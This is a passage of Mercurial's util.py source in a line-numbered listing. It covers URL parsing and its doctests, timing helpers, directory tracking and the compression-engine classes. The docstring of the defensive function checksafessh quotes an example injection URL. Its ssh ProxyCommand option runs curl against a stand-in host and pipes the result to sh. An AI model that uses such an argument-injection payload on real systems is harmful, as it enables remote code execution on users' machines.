2559 2558 If parsefragment is False, fragment is included in query. If
2560 2559 parsequery is False, query is included in path. If both are
2561 2560 False, both fragment and query are included in path.
2562 2561
2563 2562 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2564 2563
2565 2564 Note that for backward compatibility reasons, bundle URLs do not
2566 2565 take host names. That means 'bundle://../' has a path of '../'.
2567 2566
2568 2567 Examples:
2569 2568
2570 2569 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2571 2570 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2572 2571 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2573 2572 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2574 2573 >>> url(b'file:///home/joe/repo')
2575 2574 <url scheme: 'file', path: '/home/joe/repo'>
2576 2575 >>> url(b'file:///c:/temp/foo/')
2577 2576 <url scheme: 'file', path: 'c:/temp/foo/'>
2578 2577 >>> url(b'bundle:foo')
2579 2578 <url scheme: 'bundle', path: 'foo'>
2580 2579 >>> url(b'bundle://../foo')
2581 2580 <url scheme: 'bundle', path: '../foo'>
2582 2581 >>> url(br'c:\foo\bar')
2583 2582 <url path: 'c:\\foo\\bar'>
2584 2583 >>> url(br'\\blah\blah\blah')
2585 2584 <url path: '\\\\blah\\blah\\blah'>
2586 2585 >>> url(br'\\blah\blah\blah#baz')
2587 2586 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2588 2587 >>> url(br'file:///C:\users\me')
2589 2588 <url scheme: 'file', path: 'C:\\users\\me'>
2590 2589
2591 2590 Authentication credentials:
2592 2591
2593 2592 >>> url(b'ssh://joe:xyz@x/repo')
2594 2593 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2595 2594 >>> url(b'ssh://joe@x/repo')
2596 2595 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2597 2596
2598 2597 Query strings and fragments:
2599 2598
2600 2599 >>> url(b'http://host/a?b#c')
2601 2600 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2602 2601 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2603 2602 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2604 2603
2605 2604 Empty path:
2606 2605
2607 2606 >>> url(b'')
2608 2607 <url path: ''>
2609 2608 >>> url(b'#a')
2610 2609 <url path: '', fragment: 'a'>
2611 2610 >>> url(b'http://host/')
2612 2611 <url scheme: 'http', host: 'host', path: ''>
2613 2612 >>> url(b'http://host/#a')
2614 2613 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2615 2614
2616 2615 Only scheme:
2617 2616
2618 2617 >>> url(b'http:')
2619 2618 <url scheme: 'http'>
2620 2619 """
2621 2620
2622 2621 _safechars = "!~*'()+"
2623 2622 _safepchars = "/!~*'()+:\\"
2624 2623 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2625 2624
2626 2625 def __init__(self, path, parsequery=True, parsefragment=True):
2627 2626 # We slowly chomp away at path until we have only the path left
2628 2627 self.scheme = self.user = self.passwd = self.host = None
2629 2628 self.port = self.path = self.query = self.fragment = None
2630 2629 self._localpath = True
2631 2630 self._hostport = ''
2632 2631 self._origpath = path
2633 2632
2634 2633 if parsefragment and '#' in path:
2635 2634 path, self.fragment = path.split('#', 1)
2636 2635
2637 2636 # special case for Windows drive letters and UNC paths
2638 2637 if hasdriveletter(path) or path.startswith('\\\\'):
2639 2638 self.path = path
2640 2639 return
2641 2640
2642 2641 # For compatibility reasons, we can't handle bundle paths as
2643 2642 # normal URLS
2644 2643 if path.startswith('bundle:'):
2645 2644 self.scheme = 'bundle'
2646 2645 path = path[7:]
2647 2646 if path.startswith('//'):
2648 2647 path = path[2:]
2649 2648 self.path = path
2650 2649 return
2651 2650
2652 2651 if self._matchscheme(path):
2653 2652 parts = path.split(':', 1)
2654 2653 if parts[0]:
2655 2654 self.scheme, path = parts
2656 2655 self._localpath = False
2657 2656
2658 2657 if not path:
2659 2658 path = None
2660 2659 if self._localpath:
2661 2660 self.path = ''
2662 2661 return
2663 2662 else:
2664 2663 if self._localpath:
2665 2664 self.path = path
2666 2665 return
2667 2666
2668 2667 if parsequery and '?' in path:
2669 2668 path, self.query = path.split('?', 1)
2670 2669 if not path:
2671 2670 path = None
2672 2671 if not self.query:
2673 2672 self.query = None
2674 2673
2675 2674 # // is required to specify a host/authority
2676 2675 if path and path.startswith('//'):
2677 2676 parts = path[2:].split('/', 1)
2678 2677 if len(parts) > 1:
2679 2678 self.host, path = parts
2680 2679 else:
2681 2680 self.host = parts[0]
2682 2681 path = None
2683 2682 if not self.host:
2684 2683 self.host = None
2685 2684 # path of file:///d is /d
2686 2685 # path of file:///d:/ is d:/, not /d:/
2687 2686 if path and not hasdriveletter(path):
2688 2687 path = '/' + path
2689 2688
2690 2689 if self.host and '@' in self.host:
2691 2690 self.user, self.host = self.host.rsplit('@', 1)
2692 2691 if ':' in self.user:
2693 2692 self.user, self.passwd = self.user.split(':', 1)
2694 2693 if not self.host:
2695 2694 self.host = None
2696 2695
2697 2696 # Don't split on colons in IPv6 addresses without ports
2698 2697 if (self.host and ':' in self.host and
2699 2698 not (self.host.startswith('[') and self.host.endswith(']'))):
2700 2699 self._hostport = self.host
2701 2700 self.host, self.port = self.host.rsplit(':', 1)
2702 2701 if not self.host:
2703 2702 self.host = None
2704 2703
2705 2704 if (self.host and self.scheme == 'file' and
2706 2705 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2707 2706 raise error.Abort(_('file:// URLs can only refer to localhost'))
2708 2707
2709 2708 self.path = path
2710 2709
2711 2710 # leave the query string escaped
2712 2711 for a in ('user', 'passwd', 'host', 'port',
2713 2712 'path', 'fragment'):
2714 2713 v = getattr(self, a)
2715 2714 if v is not None:
2716 2715 setattr(self, a, urlreq.unquote(v))
2717 2716
2718 2717 @encoding.strmethod
2719 2718 def __repr__(self):
2720 2719 attrs = []
2721 2720 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2722 2721 'query', 'fragment'):
2723 2722 v = getattr(self, a)
2724 2723 if v is not None:
2725 2724 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2726 2725 return '<url %s>' % ', '.join(attrs)
2727 2726
2728 2727 def __bytes__(self):
2729 2728 r"""Join the URL's components back into a URL string.
2730 2729
2731 2730 Examples:
2732 2731
2733 2732 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2734 2733 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2735 2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2736 2735 'http://user:pw@host:80/?foo=bar&baz=42'
2737 2736 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2738 2737 'http://user:pw@host:80/?foo=bar%3dbaz'
2739 2738 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2740 2739 'ssh://user:pw@[::1]:2200//home/joe#'
2741 2740 >>> bytes(url(b'http://localhost:80//'))
2742 2741 'http://localhost:80//'
2743 2742 >>> bytes(url(b'http://localhost:80/'))
2744 2743 'http://localhost:80/'
2745 2744 >>> bytes(url(b'http://localhost:80'))
2746 2745 'http://localhost:80/'
2747 2746 >>> bytes(url(b'bundle:foo'))
2748 2747 'bundle:foo'
2749 2748 >>> bytes(url(b'bundle://../foo'))
2750 2749 'bundle:../foo'
2751 2750 >>> bytes(url(b'path'))
2752 2751 'path'
2753 2752 >>> bytes(url(b'file:///tmp/foo/bar'))
2754 2753 'file:///tmp/foo/bar'
2755 2754 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2756 2755 'file:///c:/tmp/foo/bar'
2757 2756 >>> print(url(br'bundle:foo\bar'))
2758 2757 bundle:foo\bar
2759 2758 >>> print(url(br'file:///D:\data\hg'))
2760 2759 file:///D:\data\hg
2761 2760 """
2762 2761 if self._localpath:
2763 2762 s = self.path
2764 2763 if self.scheme == 'bundle':
2765 2764 s = 'bundle:' + s
2766 2765 if self.fragment:
2767 2766 s += '#' + self.fragment
2768 2767 return s
2769 2768
2770 2769 s = self.scheme + ':'
2771 2770 if self.user or self.passwd or self.host:
2772 2771 s += '//'
2773 2772 elif self.scheme and (not self.path or self.path.startswith('/')
2774 2773 or hasdriveletter(self.path)):
2775 2774 s += '//'
2776 2775 if hasdriveletter(self.path):
2777 2776 s += '/'
2778 2777 if self.user:
2779 2778 s += urlreq.quote(self.user, safe=self._safechars)
2780 2779 if self.passwd:
2781 2780 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2782 2781 if self.user or self.passwd:
2783 2782 s += '@'
2784 2783 if self.host:
2785 2784 if not (self.host.startswith('[') and self.host.endswith(']')):
2786 2785 s += urlreq.quote(self.host)
2787 2786 else:
2788 2787 s += self.host
2789 2788 if self.port:
2790 2789 s += ':' + urlreq.quote(self.port)
2791 2790 if self.host:
2792 2791 s += '/'
2793 2792 if self.path:
2794 2793 # TODO: similar to the query string, we should not unescape the
2795 2794 # path when we store it, the path might contain '%2f' = '/',
2796 2795 # which we should *not* escape.
2797 2796 s += urlreq.quote(self.path, safe=self._safepchars)
2798 2797 if self.query:
2799 2798 # we store the query in escaped form.
2800 2799 s += '?' + self.query
2801 2800 if self.fragment is not None:
2802 2801 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2803 2802 return s
2804 2803
2805 2804 __str__ = encoding.strmethod(__bytes__)
2806 2805
2807 2806 def authinfo(self):
2808 2807 user, passwd = self.user, self.passwd
2809 2808 try:
2810 2809 self.user, self.passwd = None, None
2811 2810 s = bytes(self)
2812 2811 finally:
2813 2812 self.user, self.passwd = user, passwd
2814 2813 if not self.user:
2815 2814 return (s, None)
2816 2815 # authinfo[1] is passed to urllib2 password manager, and its
2817 2816 # URIs must not contain credentials. The host is passed in the
2818 2817 # URIs list because Python < 2.4.3 uses only that to search for
2819 2818 # a password.
2820 2819 return (s, (None, (s, self.host),
2821 2820 self.user, self.passwd or ''))
2822 2821
2823 2822 def isabs(self):
2824 2823 if self.scheme and self.scheme != 'file':
2825 2824 return True # remote URL
2826 2825 if hasdriveletter(self.path):
2827 2826 return True # absolute for our purposes - can't be joined()
2828 2827 if self.path.startswith(br'\\'):
2829 2828 return True # Windows UNC path
2830 2829 if self.path.startswith('/'):
2831 2830 return True # POSIX-style
2832 2831 return False
2833 2832
2834 2833 def localpath(self):
2835 2834 if self.scheme == 'file' or self.scheme == 'bundle':
2836 2835 path = self.path or '/'
2837 2836 # For Windows, we need to promote hosts containing drive
2838 2837 # letters to paths with drive letters.
2839 2838 if hasdriveletter(self._hostport):
2840 2839 path = self._hostport + '/' + self.path
2841 2840 elif (self.host is not None and self.path
2842 2841 and not hasdriveletter(path)):
2843 2842 path = '/' + path
2844 2843 return path
2845 2844 return self._origpath
2846 2845
2847 2846 def islocal(self):
2848 2847 '''whether localpath will return something that posixfile can open'''
2849 2848 return (not self.scheme or self.scheme == 'file'
2850 2849 or self.scheme == 'bundle')
2851 2850
2852 2851 def hasscheme(path):
2853 2852 return bool(url(path).scheme)
2854 2853
2855 2854 def hasdriveletter(path):
2856 2855 return path and path[1:2] == ':' and path[0:1].isalpha()
2857 2856
2858 2857 def urllocalpath(path):
2859 2858 return url(path, parsequery=False, parsefragment=False).localpath()
2860 2859
2861 2860 def checksafessh(path):
2862 2861 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2863 2862
2864 2863 This is a sanity check for ssh urls. ssh will parse the first item as
2865 2864 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2866 2865 Let's prevent these potentially exploited urls entirely and warn the
2867 2866 user.
2868 2867
2869 2868 Raises an error.Abort when the url is unsafe.
2870 2869 """
2871 2870 path = urlreq.unquote(path)
2872 2871 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2873 2872 raise error.Abort(_('potentially unsafe url: %r') %
2874 2873 (pycompat.bytestr(path),))
2875 2874
2876 2875 def hidepassword(u):
2877 2876 '''hide user credential in a url string'''
2878 2877 u = url(u)
2879 2878 if u.passwd:
2880 2879 u.passwd = '***'
2881 2880 return bytes(u)
2882 2881
2883 2882 def removeauth(u):
2884 2883 '''remove all authentication information from a url string'''
2885 2884 u = url(u)
2886 2885 u.user = u.passwd = None
2887 2886 return bytes(u)
2888 2887
2889 2888 timecount = unitcountfn(
2890 2889 (1, 1e3, _('%.0f s')),
2891 2890 (100, 1, _('%.1f s')),
2892 2891 (10, 1, _('%.2f s')),
2893 2892 (1, 1, _('%.3f s')),
2894 2893 (100, 0.001, _('%.1f ms')),
2895 2894 (10, 0.001, _('%.2f ms')),
2896 2895 (1, 0.001, _('%.3f ms')),
2897 2896 (100, 0.000001, _('%.1f us')),
2898 2897 (10, 0.000001, _('%.2f us')),
2899 2898 (1, 0.000001, _('%.3f us')),
2900 2899 (100, 0.000000001, _('%.1f ns')),
2901 2900 (10, 0.000000001, _('%.2f ns')),
2902 2901 (1, 0.000000001, _('%.3f ns')),
2903 2902 )
2904 2903
2905 2904 _timenesting = [0]
2906 2905
2907 2906 def timed(func):
2908 2907 '''Report the execution time of a function call to stderr.
2909 2908
2910 2909 During development, use as a decorator when you need to measure
2911 2910 the cost of a function, e.g. as follows:
2912 2911
2913 2912 @util.timed
2914 2913 def foo(a, b, c):
2915 2914 pass
2916 2915 '''
2917 2916
2918 2917 def wrapper(*args, **kwargs):
2919 2918 start = timer()
2920 2919 indent = 2
2921 2920 _timenesting[0] += indent
2922 2921 try:
2923 2922 return func(*args, **kwargs)
2924 2923 finally:
2925 2924 elapsed = timer() - start
2926 2925 _timenesting[0] -= indent
2927 2926 stderr = procutil.stderr
2928 2927 stderr.write('%s%s: %s\n' %
2929 2928 (' ' * _timenesting[0], func.__name__,
2930 2929 timecount(elapsed)))
2931 2930 return wrapper
2932 2931
2933 2932 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2934 2933 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2935 2934
2936 2935 def sizetoint(s):
2937 2936 '''Convert a space specifier to a byte count.
2938 2937
2939 2938 >>> sizetoint(b'30')
2940 2939 30
2941 2940 >>> sizetoint(b'2.2kb')
2942 2941 2252
2943 2942 >>> sizetoint(b'6M')
2944 2943 6291456
2945 2944 '''
2946 2945 t = s.strip().lower()
2947 2946 try:
2948 2947 for k, u in _sizeunits:
2949 2948 if t.endswith(k):
2950 2949 return int(float(t[:-len(k)]) * u)
2951 2950 return int(t)
2952 2951 except ValueError:
2953 2952 raise error.ParseError(_("couldn't parse size: %s") % s)
2954 2953
2955 2954 class hooks(object):
2956 2955 '''A collection of hook functions that can be used to extend a
2957 2956 function's behavior. Hooks are called in lexicographic order,
2958 2957 based on the names of their sources.'''
2959 2958
2960 2959 def __init__(self):
2961 2960 self._hooks = []
2962 2961
2963 2962 def add(self, source, hook):
2964 2963 self._hooks.append((source, hook))
2965 2964
2966 2965 def __call__(self, *args):
2967 2966 self._hooks.sort(key=lambda x: x[0])
2968 2967 results = []
2969 2968 for source, hook in self._hooks:
2970 2969 results.append(hook(*args))
2971 2970 return results
2972 2971
2973 2972 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2974 2973 '''Yields lines for a nicely formatted stacktrace.
2975 2974 Skips the 'skip' last entries, then return the last 'depth' entries.
2976 2975 Each file+linenumber is formatted according to fileline.
2977 2976 Each line is formatted according to line.
2978 2977 If line is None, it yields:
2979 2978 length of longest filepath+line number,
2980 2979 filepath+linenumber,
2981 2980 function
2982 2981
2983 2982 Not be used in production code but very convenient while developing.
2984 2983 '''
2985 2984 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2986 2985 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2987 2986 ][-depth:]
2988 2987 if entries:
2989 2988 fnmax = max(len(entry[0]) for entry in entries)
2990 2989 for fnln, func in entries:
2991 2990 if line is None:
2992 2991 yield (fnmax, fnln, func)
2993 2992 else:
2994 2993 yield line % (fnmax, fnln, func)
2995 2994
2996 2995 def debugstacktrace(msg='stacktrace', skip=0,
2997 2996 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2998 2997 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2999 2998 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3000 2999 By default it will flush stdout first.
3001 3000 It can be used everywhere and intentionally does not require an ui object.
3002 3001 Not be used in production code but very convenient while developing.
3003 3002 '''
3004 3003 if otherf:
3005 3004 otherf.flush()
3006 3005 f.write('%s at:\n' % msg.rstrip())
3007 3006 for line in getstackframes(skip + 1, depth=depth):
3008 3007 f.write(line)
3009 3008 f.flush()
3010 3009
3011 3010 class dirs(object):
3012 3011 '''a multiset of directory names from a dirstate or manifest'''
3013 3012
3014 3013 def __init__(self, map, skip=None):
3015 3014 self._dirs = {}
3016 3015 addpath = self.addpath
3017 3016 if safehasattr(map, 'iteritems') and skip is not None:
3018 3017 for f, s in map.iteritems():
3019 3018 if s[0] != skip:
3020 3019 addpath(f)
3021 3020 else:
3022 3021 for f in map:
3023 3022 addpath(f)
3024 3023
3025 3024 def addpath(self, path):
3026 3025 dirs = self._dirs
3027 3026 for base in finddirs(path):
3028 3027 if base in dirs:
3029 3028 dirs[base] += 1
3030 3029 return
3031 3030 dirs[base] = 1
3032 3031
3033 3032 def delpath(self, path):
3034 3033 dirs = self._dirs
3035 3034 for base in finddirs(path):
3036 3035 if dirs[base] > 1:
3037 3036 dirs[base] -= 1
3038 3037 return
3039 3038 del dirs[base]
3040 3039
3041 3040 def __iter__(self):
3042 3041 return iter(self._dirs)
3043 3042
3044 3043 def __contains__(self, d):
3045 3044 return d in self._dirs
3046 3045
3047 3046 if safehasattr(parsers, 'dirs'):
3048 3047 dirs = parsers.dirs
3049 3048
3050 3049 def finddirs(path):
3051 3050 pos = path.rfind('/')
3052 3051 while pos != -1:
3053 3052 yield path[:pos]
3054 3053 pos = path.rfind('/', 0, pos)
3055 3054
3056 3055 # compression code
3057 3056
3058 3057 SERVERROLE = 'server'
3059 3058 CLIENTROLE = 'client'
3060 3059
3061 3060 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3062 3061 (u'name', u'serverpriority',
3063 3062 u'clientpriority'))
3064 3063
3065 3064 class compressormanager(object):
3066 3065 """Holds registrations of various compression engines.
3067 3066
3068 3067 This class essentially abstracts the differences between compression
3069 3068 engines to allow new compression formats to be added easily, possibly from
3070 3069 extensions.
3071 3070
3072 3071 Compressors are registered against the global instance by calling its
3073 3072 ``register()`` method.
3074 3073 """
3075 3074 def __init__(self):
3076 3075 self._engines = {}
3077 3076 # Bundle spec human name to engine name.
3078 3077 self._bundlenames = {}
3079 3078 # Internal bundle identifier to engine name.
3080 3079 self._bundletypes = {}
3081 3080 # Revlog header to engine name.
3082 3081 self._revlogheaders = {}
3083 3082 # Wire proto identifier to engine name.
3084 3083 self._wiretypes = {}
3085 3084
3086 3085 def __getitem__(self, key):
3087 3086 return self._engines[key]
3088 3087
3089 3088 def __contains__(self, key):
3090 3089 return key in self._engines
3091 3090
3092 3091 def __iter__(self):
3093 3092 return iter(self._engines.keys())
3094 3093
3095 3094 def register(self, engine):
3096 3095 """Register a compression engine with the manager.
3097 3096
3098 3097 The argument must be a ``compressionengine`` instance.
3099 3098 """
3100 3099 if not isinstance(engine, compressionengine):
3101 3100 raise ValueError(_('argument must be a compressionengine'))
3102 3101
3103 3102 name = engine.name()
3104 3103
3105 3104 if name in self._engines:
3106 3105 raise error.Abort(_('compression engine %s already registered') %
3107 3106 name)
3108 3107
3109 3108 bundleinfo = engine.bundletype()
3110 3109 if bundleinfo:
3111 3110 bundlename, bundletype = bundleinfo
3112 3111
3113 3112 if bundlename in self._bundlenames:
3114 3113 raise error.Abort(_('bundle name %s already registered') %
3115 3114 bundlename)
3116 3115 if bundletype in self._bundletypes:
3117 3116 raise error.Abort(_('bundle type %s already registered by %s') %
3118 3117 (bundletype, self._bundletypes[bundletype]))
3119 3118
3120 3119 # No external facing name declared.
3121 3120 if bundlename:
3122 3121 self._bundlenames[bundlename] = name
3123 3122
3124 3123 self._bundletypes[bundletype] = name
3125 3124
3126 3125 wiresupport = engine.wireprotosupport()
3127 3126 if wiresupport:
3128 3127 wiretype = wiresupport.name
3129 3128 if wiretype in self._wiretypes:
3130 3129 raise error.Abort(_('wire protocol compression %s already '
3131 3130 'registered by %s') %
3132 3131 (wiretype, self._wiretypes[wiretype]))
3133 3132
3134 3133 self._wiretypes[wiretype] = name
3135 3134
3136 3135 revlogheader = engine.revlogheader()
3137 3136 if revlogheader and revlogheader in self._revlogheaders:
3138 3137 raise error.Abort(_('revlog header %s already registered by %s') %
3139 3138 (revlogheader, self._revlogheaders[revlogheader]))
3140 3139
3141 3140 if revlogheader:
3142 3141 self._revlogheaders[revlogheader] = name
3143 3142
3144 3143 self._engines[name] = engine
3145 3144
3146 3145 @property
3147 3146 def supportedbundlenames(self):
3148 3147 return set(self._bundlenames.keys())
3149 3148
3150 3149 @property
3151 3150 def supportedbundletypes(self):
3152 3151 return set(self._bundletypes.keys())
3153 3152
3154 3153 def forbundlename(self, bundlename):
3155 3154 """Obtain a compression engine registered to a bundle name.
3156 3155
3157 3156 Will raise KeyError if the bundle type isn't registered.
3158 3157
3159 3158 Will abort if the engine is known but not available.
3160 3159 """
3161 3160 engine = self._engines[self._bundlenames[bundlename]]
3162 3161 if not engine.available():
3163 3162 raise error.Abort(_('compression engine %s could not be loaded') %
3164 3163 engine.name())
3165 3164 return engine
3166 3165
3167 3166 def forbundletype(self, bundletype):
3168 3167 """Obtain a compression engine registered to a bundle type.
3169 3168
3170 3169 Will raise KeyError if the bundle type isn't registered.
3171 3170
3172 3171 Will abort if the engine is known but not available.
3173 3172 """
3174 3173 engine = self._engines[self._bundletypes[bundletype]]
3175 3174 if not engine.available():
3176 3175 raise error.Abort(_('compression engine %s could not be loaded') %
3177 3176 engine.name())
3178 3177 return engine
3179 3178
3180 3179 def supportedwireengines(self, role, onlyavailable=True):
3181 3180 """Obtain compression engines that support the wire protocol.
3182 3181
3183 3182 Returns a list of engines in prioritized order, most desired first.
3184 3183
3185 3184 If ``onlyavailable`` is set, filter out engines that can't be
3186 3185 loaded.
3187 3186 """
3188 3187 assert role in (SERVERROLE, CLIENTROLE)
3189 3188
3190 3189 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3191 3190
3192 3191 engines = [self._engines[e] for e in self._wiretypes.values()]
3193 3192 if onlyavailable:
3194 3193 engines = [e for e in engines if e.available()]
3195 3194
3196 3195 def getkey(e):
3197 3196 # Sort first by priority, highest first. In case of tie, sort
3198 3197 # alphabetically. This is arbitrary, but ensures output is
3199 3198 # stable.
3200 3199 w = e.wireprotosupport()
3201 3200 return -1 * getattr(w, attr), w.name
3202 3201
3203 3202 return list(sorted(engines, key=getkey))
3204 3203
3205 3204 def forwiretype(self, wiretype):
3206 3205 engine = self._engines[self._wiretypes[wiretype]]
3207 3206 if not engine.available():
3208 3207 raise error.Abort(_('compression engine %s could not be loaded') %
3209 3208 engine.name())
3210 3209 return engine
3211 3210
3212 3211 def forrevlogheader(self, header):
3213 3212 """Obtain a compression engine registered to a revlog header.
3214 3213
3215 3214 Will raise KeyError if the revlog header value isn't registered.
3216 3215 """
3217 3216 return self._engines[self._revlogheaders[header]]
3218 3217
3219 3218 compengines = compressormanager()
3220 3219
3221 3220 class compressionengine(object):
3222 3221 """Base class for compression engines.
3223 3222
3224 3223 Compression engines must implement the interface defined by this class.
3225 3224 """
3226 3225 def name(self):
3227 3226 """Returns the name of the compression engine.
3228 3227
3229 3228 This is the key the engine is registered under.
3230 3229
3231 3230 This method must be implemented.
3232 3231 """
3233 3232 raise NotImplementedError()
3234 3233
3235 3234 def available(self):
3236 3235 """Whether the compression engine is available.
3237 3236
3238 3237 The intent of this method is to allow optional compression engines
3239 3238 that may not be available in all installations (such as engines relying
3240 3239 on C extensions that may not be present).
3241 3240 """
3242 3241 return True
3243 3242
3244 3243 def bundletype(self):
3245 3244 """Describes bundle identifiers for this engine.
3246 3245
3247 3246 If this compression engine isn't supported for bundles, returns None.
3248 3247
3249 3248 If this engine can be used for bundles, returns a 2-tuple of strings of
3250 3249 the user-facing "bundle spec" compression name and an internal
3251 3250 identifier used to denote the compression format within bundles. To
3252 3251 exclude the name from external usage, set the first element to ``None``.
3253 3252
3254 3253 If bundle compression is supported, the class must also implement
3255 3254 ``compressstream`` and `decompressorreader``.
3256 3255
3257 3256 The docstring of this method is used in the help system to tell users
3258 3257 about this engine.
3259 3258 """
3260 3259 return None
3261 3260
3262 3261 def wireprotosupport(self):
3263 3262 """Declare support for this compression format on the wire protocol.
3264 3263
3265 3264 If this compression engine isn't supported for compressing wire
3266 3265 protocol payloads, returns None.
3267 3266
3268 3267 Otherwise, returns ``compenginewireprotosupport`` with the following
3269 3268 fields:
3270 3269
3271 3270 * String format identifier
3272 3271 * Integer priority for the server
3273 3272 * Integer priority for the client
3274 3273
3275 3274 The integer priorities are used to order the advertisement of format
3276 3275 support by server and client. The highest integer is advertised
3277 3276 first. Integers with non-positive values aren't advertised.
3278 3277
3279 3278 The priority values are somewhat arbitrary and only used for default
3280 3279 ordering. The relative order can be changed via config options.
3281 3280
3282 3281 If wire protocol compression is supported, the class must also implement
3283 3282 ``compressstream`` and ``decompressorreader``.
3284 3283 """
3285 3284 return None
3286 3285
3287 3286 def revlogheader(self):
3288 3287 """Header added to revlog chunks that identifies this engine.
3289 3288
3290 3289 If this engine can be used to compress revlogs, this method should
3291 3290 return the bytes used to identify chunks compressed with this engine.
3292 3291 Else, the method should return ``None`` to indicate it does not
3293 3292 participate in revlog compression.
3294 3293 """
3295 3294 return None
3296 3295
3297 3296 def compressstream(self, it, opts=None):
3298 3297 """Compress an iterator of chunks.
3299 3298
3300 3299 The method receives an iterator (ideally a generator) of chunks of
3301 3300 bytes to be compressed. It returns an iterator (ideally a generator)
3302 3301 of bytes of chunks representing the compressed output.
3303 3302
3304 3303 Optionally accepts an argument defining how to perform compression.
3305 3304 Each engine treats this argument differently.
3306 3305 """
3307 3306 raise NotImplementedError()
3308 3307
3309 3308 def decompressorreader(self, fh):
3310 3309 """Perform decompression on a file object.
3311 3310
3312 3311 Argument is an object with a ``read(size)`` method that returns
3313 3312 compressed data. Return value is an object with a ``read(size)`` that
3314 3313 returns uncompressed data.
3315 3314 """
3316 3315 raise NotImplementedError()
3317 3316
3318 3317 def revlogcompressor(self, opts=None):
3319 3318 """Obtain an object that can be used to compress revlog entries.
3320 3319
3321 3320 The object has a ``compress(data)`` method that compresses binary
3322 3321 data. This method returns compressed binary data or ``None`` if
3323 3322 the data could not be compressed (too small, not compressible, etc).
3324 3323 The returned data should have a header uniquely identifying this
3325 3324 compression format so decompression can be routed to this engine.
3326 3325 This header should be identified by the ``revlogheader()`` return
3327 3326 value.
3328 3327
3329 3328 The object has a ``decompress(data)`` method that decompresses
3330 3329 data. The method will only be called if ``data`` begins with
3331 3330 ``revlogheader()``. The method should return the raw, uncompressed
3332 3331 data or raise a ``RevlogError``.
3333 3332
3334 3333 The object is reusable but is not thread safe.
3335 3334 """
3336 3335 raise NotImplementedError()
3337 3336
3338 3337 class _zlibengine(compressionengine):
3339 3338 def name(self):
3340 3339 return 'zlib'
3341 3340
3342 3341 def bundletype(self):
3343 3342 """zlib compression using the DEFLATE algorithm.
3344 3343
3345 3344 All Mercurial clients should support this format. The compression
3346 3345 algorithm strikes a reasonable balance between compression ratio
3347 3346 and size.
3348 3347 """
3349 3348 return 'gzip', 'GZ'
3350 3349
3351 3350 def wireprotosupport(self):
3352 3351 return compewireprotosupport('zlib', 20, 20)
3353 3352
3354 3353 def revlogheader(self):
3355 3354 return 'x'
3356 3355
3357 3356 def compressstream(self, it, opts=None):
3358 3357 opts = opts or {}
3359 3358
3360 3359 z = zlib.compressobj(opts.get('level', -1))
3361 3360 for chunk in it:
3362 3361 data = z.compress(chunk)
3363 3362 # Not all calls to compress emit data. It is cheaper to inspect
3364 3363 # here than to feed empty chunks through generator.
3365 3364 if data:
3366 3365 yield data
3367 3366
3368 3367 yield z.flush()
3369 3368
3370 3369 def decompressorreader(self, fh):
3371 3370 def gen():
3372 3371 d = zlib.decompressobj()
3373 3372 for chunk in filechunkiter(fh):
3374 3373 while chunk:
3375 3374 # Limit output size to limit memory.
3376 3375 yield d.decompress(chunk, 2 ** 18)
3377 3376 chunk = d.unconsumed_tail
3378 3377
3379 3378 return chunkbuffer(gen())
3380 3379
3381 3380 class zlibrevlogcompressor(object):
3382 3381 def compress(self, data):
3383 3382 insize = len(data)
3384 3383 # Caller handles empty input case.
3385 3384 assert insize > 0
3386 3385
3387 3386 if insize < 44:
3388 3387 return None
3389 3388
3390 3389 elif insize <= 1000000:
3391 3390 compressed = zlib.compress(data)
3392 3391 if len(compressed) < insize:
3393 3392 return compressed
3394 3393 return None
3395 3394
3396 3395 # zlib makes an internal copy of the input buffer, doubling
3397 3396 # memory usage for large inputs. So do streaming compression
3398 3397 # on large inputs.
3399 3398 else:
3400 3399 z = zlib.compressobj()
3401 3400 parts = []
3402 3401 pos = 0
3403 3402 while pos < insize:
3404 3403 pos2 = pos + 2**20
3405 3404 parts.append(z.compress(data[pos:pos2]))
3406 3405 pos = pos2
3407 3406 parts.append(z.flush())
3408 3407
3409 3408 if sum(map(len, parts)) < insize:
3410 3409 return ''.join(parts)
3411 3410 return None
3412 3411
3413 3412 def decompress(self, data):
3414 3413 try:
3415 3414 return zlib.decompress(data)
3416 3415 except zlib.error as e:
3417 3416 raise error.RevlogError(_('revlog decompress error: %s') %
